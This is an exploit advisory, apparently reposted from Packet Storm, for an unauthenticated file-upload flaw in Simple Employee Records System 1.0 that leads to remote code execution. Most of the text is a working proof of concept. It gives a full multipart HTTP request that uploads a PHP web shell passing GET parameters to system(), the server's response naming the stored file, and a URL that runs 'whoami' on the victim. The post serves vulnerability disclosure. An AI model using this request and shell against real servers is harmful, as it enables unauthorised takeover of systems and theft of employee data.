Simple Employee Records System 1.0 Shell Upload ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on February 27th, 2021 📆 | 4005 Views ⚑

0

Simple Employee Records System 1.0 Shell Upload ≈ Packet Storm

# Exploit Title: Simple Employee Records System – File Upload RCE
(Unauthenticated)
# Date: 2021-02-25
# Exploit Author: [email protected]
# Vendor Homepage:
https://www.sourcecodester.com/php/11393/employee-records-system.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip
# Version: v1.0
# Tested on: Ubuntu 20.04.2

http://IP/dashboard/uploadID.php can be used to upload .php files to
‘/uploads/employees_ids/’ without authentication.

POC

1) Make the following Request changing the “Host:” to your Victim IP.

POST /dashboard/uploadID.php HTTP/1.1
Host: 192.168.1.117
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=—————————5825462663702204104870787337
Content-Length: 267
DNT: 1
Connection: close

—————————–5825462663702204104870787337
Content-Disposition: form-data; name=”employee_ID”; filename=”cmd2.php”
Content-Type: image/png
< ?php
$cmd=$_GET[‘cmd’];
system($cmd);
?>
—————————–5825462663702204104870787337–

2) You will get the response with the randomized name of the uploaded
file (upload_filename).

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 25 Feb 2021 19:17:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77
{“upload_filename”:”Ag1rzKFWTlnCZhL_cmd2.php”,”selected_filename”:”cmd2.php”}

3) Your file will be located in:
http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php

4) In this example, to run commands:
http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami

Source link

Tagged with:



Leave a Reply